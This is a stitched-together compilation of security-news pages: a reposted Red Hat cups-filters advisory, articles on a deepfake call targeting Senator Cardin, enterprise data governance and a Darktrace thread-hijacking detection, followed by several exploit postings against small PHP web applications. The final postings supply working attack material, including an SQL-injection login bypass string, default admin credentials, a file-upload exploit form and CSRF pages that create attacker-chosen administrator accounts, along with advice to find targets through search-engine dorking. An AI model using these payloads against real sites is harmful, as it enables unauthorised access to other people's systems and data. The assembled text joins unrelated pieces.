Red Hat Security Advisory 2024-7346-03 - An update for cups-filters is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7346.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: cups-filters security updateAdvisory ID:        RHSA-2024:7346-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7346Issue date:         2024-09-27Revision:           03CVE Names:          CVE-2024-47076====================================================================Summary: An update for cups-filters is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The cups-filters package contains back ends, filters, and other software that was once part of the core Common UNIX Printing System (CUPS) distribution but is now maintained independently. Security Fix(es):* cups-browsed: cups-browsed binds on UDP INADDR_ANY:631 trusting any packet from any source ()* cups-filters: libcupsfilters: `cfGetPrinterAttributes` API does not perform sanitization on returned IPP attributes (CVE-2024-47076)* cups: libppd: remote command injection via attacker controlled data in PPD file ()For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-47076References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2314252https://bugzilla.redhat.com/show_bug.cgi?id=2314253https://bugzilla.redhat.com/show_bug.cgi?id=2314256

Red Hat Security Advisory 2024-7346-03

The threat actors managed to gain access to Sen. Ben Cardin (D-Md.) by posing as a Ukrainian official, before quickly being outed.

Sen. Ben CardinSource: B Christopher via Alamy Stock Photo

Earlier this month, Senator Ben Cardin (D-Md.), who serves as the Democratic chair of the Senate Foreign Relations Committee, was targeted in an advanced deepfake operation that managed to in part succeed in duping the politician.

The operation was centered around Cardin's professional association with Dymtro Kuleba, the former Ukrainian Minister of Foreign Affairs. Cardin's office reportedly received an email from someone they believed to be Kuleba, who Cardin already knew from past meetings.

Kuleba and Cardin met via Zoom through what seemed to be a live audio-video connection "that was consistent in appearance and sound to past encounters," according to a notice issued by the Senator’s security office.

But it was here that things began to go awry for the threat actors. "Kuleba" began to ask Cardin questions such as, "do you support long-range missiles into Russian territory? I need to know your answer," and other "politically charged questions in relation to the upcoming election" according to the notice. 

At this point, Cardin and his staff knew something was wrong.

The malicious actor on the other side of the call continued on, attempting to bait the senator into commenting on a political candidate and other things.

"The Senator and their staff ended the call, and quickly reached out to the Department of State who verified it was not Kuleba," said Nicolette Llewellyn, the director of Senate Security, in the notice.

Related:Dark Reading Confidential: Meet the Ransomware Negotiators

**Deepfake Scams Are on the Rise**

On Sept. 25, Cardin commented on the encounter, describing the person on the other side of the screen as a malign actor that engaged in a deceptive attempt to try to have a conversation with him.

"After immediately becoming clear that the individual I was engaging with was not who they claimed to be, I ended the call and my office took swift action, alerting the relevant authorities," Sen. Cardin said. "This matter is now in the hands of law enforcement, and a comprehensive investigation is underway."

However, how far these threat actors managed to get was impressive — and concerning. Had they not revealed their scheme by acting out of character for the person they were impersonating, they may have gleaned sensitive or important information.

"On an individual level, \[deepfakes\] can lead to blackmail and extortion," says Eyal Benishti, CEO of Ironscales. "For businesses, deepfakes pose risks of significant financial loss, reputational damage, and corporate espionage. On a governmental level, they threaten national security and can undermine the democratic processes" — no doubt referencing a deepfake robocall that was created to impersonate President Joe Biden with the goal of getting Biden supporters to stay home for a lower voter turnout.

Related:Zimbra RCE Vuln Under Attack Needs Immediate Patching

It's clear that deepfake schemes are becoming a bigger threat and more widely used by malicious actors. In a July report that Trend Micro shared with Dark Reading, the researchers found that 80% of the consumers involved a survey had seen deepfake images, and 64% had seen deepfake videos. Roughly half of consumers surveyed had heard of deepfake audio clips. And concerningly, 35% of the respondents said they had experienced a deepfake scam themselves, with even more saying that they know someone who has.

These types of scams come in all kinds of varieties, such as the deepfake videos of UK Prime Minister Keir Starmer and Prince William that were circulating on Meta platforms earlier this year to promote a cryptocurrency platform called Immediate Edge. The platform was fraudulent and aimed to dupe potential victims by making it seem as though it was backed by reputable public figures. According to researchers who studied the disinformation campaign, the deepfake ads reached nearly 900,000 people who spent more than £20,000 on the platform.

Related:Retail & Hospitality ISAC Announces Pam Lindemoen As New CSO and VP

"The rise of deepfakes — be it through images, videos, or audio — is hard to deny," Benishti says. "These attacks are becoming increasingly sophisticated and often indistinguishable from reality, thanks to the accessibility of generative AI tools."

And that means that defenses need to shift, Benishti says. 

"Currently, there are no foolproof methods to easily detect deepfakes," he says. "Until technology catches up, we must prioritize awareness, education, and training to equip individuals and organizations with the skills and strategies needed to act on their suspicions, implement effective verification processes, and ultimately improve their ability to discern what is real and what is not."

These recommendations apply to anyone, not just high-ranking or high-profile individuals such as Cardin.

"Cybercriminals capitalize on opportunity, regardless of status, which means that anyone could be a target," Benishti adds. "It's crucial for everyone, not just prominent figures, to stay alert and skeptical of any urgent or unexpected requests. Vigilance and verification are key defenses against these evolving threats."

Elaborate Deepfake Operation Takes a Meeting With US Senator

By combining agility with compliance, and security with accessibility, businesses will treat their data as a well-prepared traveler, ready for any adventure.

Source: Lucie Konecna via Alamy Stock Photo

COMMENTARY

The post-pandemic need for "anywhere connection" is fueling not only borderless business but also the rise of digital nomads. Surprisingly, the two face similar issues.

Consider that both international enterprises and location-independent workers must be prepared for travel, follow local rules, and carry only the essentials. For a digital nomad, this might mean a laptop, a handful of essential apps, and a reliable VPN. For an enterprise and its data, it's multicloud databases, robust encryption, and a zero-trust posture. In both cases, excess baggage only slows you down and increases vulnerability. And, in both cases, not following the rules can result in legal headaches.

Indeed, enterprises today walk a data tightrope. Their information ecosystems must be adaptable across diverse environments, navigating tightening regulations, heightened security requirements, and complex data rules.

Let's explore how enterprises can become data nomads by balancing compliance, security, and agility — all while seeing the world without getting in trouble.

**From Home Bases to Global Expeditions**

Mastering travel is crucial for digital and data nomads. Like savvy travelers navigating international borders, enterprises must maneuver a varied data landscape — especially with the likes of the European Union's General Data Protection Regulation (GDPR) acting as a stringent "passport control" for information. Therefore, understanding what's required is key to moving data from point A to B while abiding by the law.

Enterprises must first map their data — their digital luggage — to know what they have, how it's regulated, and where it's stored. Like nomads with a home base, many adopt a hybrid cloud approach. This home-and-away strategy blends on-premises infrastructure with public cloud services, offering flexibility, cost benefits, and resilience. It ensures data resides in jurisdictionally appropriate locations while enabling global reach. 

However, moving data between specific regions brings additional complications, especially between Europe and the US. For years, the "visa requirements" governing acceptable data transfers between these two superpowers have been in flux, with the EU-US Data Privacy Framework being the latest attempt to streamline cross-border data. Organizations still need to secure the right "travel permits" with a combination of approaches. This might involve keeping sensitive data in EU-based systems, using standard contractual clauses for US transfers, or applying new framework principles where relevant. However, given the turbulent history of previous agreements like Privacy Shield and Safe Harbour, enterprises should watch this space.

Another way to travel without falling afoul of the authorities is isolated connectivity. Google's Distributed Cloud latest configuration exemplifies this balance, with its air-gapped appliance allowing users to access cloud applications without jeopardizing data security — a blend of home comfort and travel flexibility for enterprise data.

**A Nomad's Security Toolkit**

But moving from place to place exposes both digital and data nomads to security risks. Just as globe-trotting workers must stay vigilant against pickpockets and scams, enterprises must be wary of bad actors — a growing concern with the rise of distributed workloads and global hackers.

The good news is that enterprises can and must fight back. End-to-end encryption acts like an unbreakable luggage lock, protecting information at every step. Multifactor authentication serves as a biometric passport, ensuring only authorized personnel gain access. Regular security audits flag potential risks, much like travel advisories. And, by embracing distributed storage, companies avoid keeping all their eggs in one basket, reducing the impact of any single breach.

Adopting a zero-trust architecture — comparable to a cautious security detail — further ensures verification regardless of origin. This "trust nothing, verify always" mindset treats every network as hostile and scrutinizes each access request, thereby reducing the risk of data breaches and unauthorized access.

**Lessons From the Road**

By now I've done this metaphor to death, but the parallels between digital nomads and enterprise data are too striking to ignore — and the challenges will only continue to evolve.

Emerging technologies like edge computing and AI will create new destinations for our data to explore. And don't expect regulations to slow down, further shaping digital travel requirements. This demands IT leaders have their finger on the pulse and think about their data journey from door to door.

The most successful enterprises will be those that can turn potential data pitfalls into opportunities for growth and innovation. By combining agility with compliance, and security with accessibility, they will treat their data as a well-prepared traveler, ready for any adventure.

The lesson from our digital nomad cousins is clear: Pack light, comply right.

**About the Author**

Founder & CEO, Hexnode

Apu Pavithran is the founder and CEO of Hexnode. Recognized in the IT management community as a consultant, speaker, and thought leader, Apu has been a strong advocate for IT governance and information security management.

Treat Your Enterprise Data Like a Digital Nomad

Darktrace AI detected and stopped a thread hijacking attack in real-time, preventing email account compromise and data theft.…

Darktrace AI detected and stopped a thread hijacking attack in real-time, preventing email account compromise and data theft. The attack involved a hidden email rule diverting messages from the intended recipient.

Cybersecurity experts have observed a rise in thread hijacking attacks, which criminals use to infiltrate email conversations and steal sensitive data. This technique is particularly stealthy due to its near-invisibility to conventional security measures and human detection.

In thread hijacking attackers gain access to a user’s email account, monitor conversations, and infiltrate conversations between individuals or organizations, exploiting trust within these threads.

In a recent incident, Darktrace’s AI technology detected and halted a thread hijacking attack in real-time, targeting a major company. The attack vector in this case is an email sent to a SaaS (Software-as-a-Service) user hours before a new email rule was created, allegedly a reply to a previous email regarding tax and payment details, which Darktrace AI detected as anomalous. The hidden email rule was created to divert specific messages away from the intended recipient. 

****Attack Details****

According to Darktrace’s blog post shared with Hackread.com ahead of publishing on Monday, a user’s email account was compromised by an attacker possibly through phishing, malware, or exploiting weak passwords. They monitored the user’s email threads looking for exploitable ongoing conversations and then inserted themselves into conversations by replying to existing emails. Because the email appeared to come from a trusted source within an ongoing thread, it bypassed many traditional security filters and raised less suspicion. 

The attacker created a new mailbox rule to forward emails to an archive folder, making it harder for the customer to notice the malicious activity. Using the trust established in the conversation, the attacker attempted to manipulate the user into clicking on malicious links or providing sensitive information.

> _“This evasion technique is typically used to move any malicious emails or responses to a rarely opened folder, ensuring that the genuine account holder does not see replies to phishing emails or other malicious messages sent by attackers.”_
> 
> Darktrace

The screenshot shows the compromised email address and the new mailbox rule created by attackers (Credit: Darktrace).

****Darktrace’s Response****

Darktrace’s Self-Learning AI detected the anomaly on August 8, 2024, which was a suspiciously named “.” mailbox rule. Darktrace’s RESPOND tool took immediate action by disabling the compromised SaaS user for 24 hours, preventing further escalation of the attack.

Additionally, a Proactive Threat Notification was sent to the Darktrace SOC team, allowing them to investigate the incident and inform the customer. Overall, the incident highlights the importance of advanced threat detection and response tools like Darktrace to protect organizations from sophisticated cyberattacks like thread hijacking.

1.  How AI is Tightening Cybersecurity for Businesses
2.  LockBit 3.0 Posts Dubious Claims of Breaching Darktrace
3.  IT and Cybersecurity Jobs in the Age of Emerging AI Technologies
4.  Email Hacking Reigns as Top Cybersecurity Threat, Indusface Study
5.  The Future of Phishing Email Training for Employees in Cybersecurity

Darktrace AI Halts Thread Hijacking Attack Targeting Major Company

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

**Student Management System 1.0 Insecure Cookie Handling**

Posted Sep 30, 2024

Authored by indoushka

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

tags | exploit, insecure cookie handling

SHA-256 | d658fbfc8c6a719141fdd1f2794283b78eab23b21c7970420e8965f026849eba

Download | Favorite | View

**Student Management System 1.0 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Student Management System 1.0 Insecure Cookie Handling Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] The default username is admin & The chosen password is user123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,997)
*   Arbitrary (17,113)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,047)
*   Code Execution (7,925)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,434)
*   DoS (25,304)
*   Encryption (2,395)
*   Exploit (54,342)
*   File Inclusion (4,278)
*   File Upload (1,022)
*   Firewall (822)
*   Info Disclosure (2,924)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,310)
*   Local (14,864)
*   Magazine (587)
*   Overflow (13,228)
*   Perl (1,435)
*   PHP (5,284)
*   Proof of Concept (2,413)
*   Protocol (3,751)
*   Python (1,662)
*   Remote (31,922)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,052)
*   Shell (3,308)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,738)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,133)
*   Web (10,144)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,306)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,130)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,374)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,912)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,882)
*   UNIX (9,461)
*   UnixWare (188)
*   Windows (6,780)
*   Other

Student Management System 1.0 Insecure Cookie Handling

Student Enrollment version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Student Enrollment v1.0 Remote File Upload Vulnerability                                                                    |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/06/Student_Enrollment_In_PHP_With_Source_Code.zip                             |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] use payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Upload Profile Photo</title>  
</head>  
<body>  
    <h2>Upload Profile Photo</h2>  
    <form action="http://127.0.0.1/student-php-enroolment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">  
        <label for="userphoto">Select Photo:</label>  
        <input type="file" id="userphoto" name="userphoto" required><br><br>

        <button type="submit" name="upphoto">Upload Photo</button>  
    </form>  
</body>  
</html>

[+] Go to the line 10. Set the target site link Save changes and apply . 

[+] save code as poc.html 

[+] Link to the uploaded files : admin/index.php?page=user-profile

[+] path : http://127.0.0.1/student-php-enroolment/admin/images/ evli.php

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Student Enrollment 1.0 Arbitrary File Upload

Sistem Penyewaan Baju atau Pakaian Berbasis Web version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Sistem Penyewaan Baju atau Pakaian Berbasis Web v1.0 Auth By Pass Vulnerability                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://shopee.co.id/Aplikasi-Sistem-Penyewaan-Baju-atau-Pakaian-Berbasis-Web-i.95672618.9716246272                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/batarisalononline/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sistem Penyewaan Baju atau Pakaian Berbasis Web 1.0 SQL Injection

Simple Student Quarterly Result / Grade System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Simple Student Quarterly Result / Grade System v1.0 Insecure Settings Vulnerability                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Simple Student Quarterly Result / Grade System 1.0 Insecure Settings

Simple Responsive Tourism Website version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Simple Responsive Tourism Website v1.0 CSRF Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following JavaScript code :

   creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:

[+] Create an XMLHttpRequest object:

    xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.

[+] Open the request:

    xhr.open("POST", "http://127.0.0.1/tourism/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".

[+] Set the request headers:

    xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.  
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.  
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.

[+] Enable sending cookies:

    xhr.withCredentials = true; Specifies that cookies should be sent with the request.

[+] Setting up the request data:

    The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.

    This string is converted to a Uint8Array and then to a Blob to be sent.

[+] Sending the request:

    xhr.send(new Blob([aBody])); Sends the data to the server.

[+] User Interface:  
    There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.

[+] Go to the line 6. Set the target site link Save changes and apply . 

[+] infected file : Users.php.

[+] Line 15 : Choose a name "indoushka".

[+] Line 19 : Choose a pass "Hacked".

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>   
<html>   
<body>  
 <script> function submitRequest()   
 { var xhr = new XMLHttpRequest();   
 xhr.open("POST", "http:\/\/127.0.0.1\/php-ycrs\/tourism\/Users.php?f=save", true);   
 xhr.setRequestHeader("Accept", "*\/*");   
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
 xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
 xhr.withCredentials = true;   
 var body =  
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"username\"\r\n" +   
 "\r\n" +   
 "indoushka\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"password\"\r\n" +   
 "\r\n" +   
 "Hacked\r\n" +   
 "-----------------------------\r\n" +   
 "Content-Disposition: form-data; name=\"type\"\r\n" +   
 "\r\n" +   
 "1\r\n" +   
 "-------------------------------\r\n";   
 var aBody = new Uint8Array(body.length);   
 for (var i = 0; i < aBody.length; i++)   
 aBody[i] = body.charCodeAt(i);   
 xhr.send(new Blob([aBody]));   
 }  
 </script>  
 <form action="#">  
 <input type="button" value="Submit request" onclick="submitRequest();" />  
 </form>   
 </body>   
 </html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Simple Responsive Tourism Website 1.0 Cross Site Request Forgery

Simple Music Management System version 1.0 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : Simple Music Management System v1.0 CSRF Add ADmin Vulnerability                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12978/music-management-system-in-php-php-project-source-code                          |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code add new admin .

[+] Go to the line 35.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">User Name:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/music/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Latest News